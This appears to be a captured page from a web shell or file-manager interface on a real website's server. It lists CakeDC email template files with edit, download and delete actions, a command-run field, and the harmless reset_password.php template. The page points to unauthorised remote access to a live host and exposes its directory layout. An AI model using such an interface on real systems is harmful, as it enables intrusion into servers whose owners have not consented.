/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
cakedc
/
users
/
templates
/
email
/
text
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakedc/users/templates/email/text
mkdir
upload
Name
Size
Mode
Actions
reset_password.php
830
0644
edit
dl
rm
social_account_validation.php
915
0644
edit
dl
rm
validation.php
830
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakedc/users/templates/email/text/reset_password.php
(830B)
<?php /** * Copyright 2010 - 2019, Cake Development Corporation (https://www.cakedc.com) * * Licensed under The MIT License * Redistributions of files must retain the above copyright notice. * * @copyright Copyright 2010 - 2018, Cake Development Corporation (https://www.cakedc.com) * @license MIT License (http://www.opensource.org/licenses/mit-license.php) */ $activationUrl = [ '_full' => true, 'prefix' => false, 'plugin' => 'CakeDC/Users', 'controller' => 'Users', 'action' => 'resetPassword', isset($token) ? $token : '' ]; ?> <?= __d('cake_d_c/users', "Hi {0}", isset($first_name) ? $first_name : '') ?>, <?= __d( 'cake_d_c/users', "Please copy the following address in your web browser {0}", $this->Url->build($activationUrl) ) ?> <?= __d('cake_d_c/users', 'Thank you') ?>,
Save
cmd:
run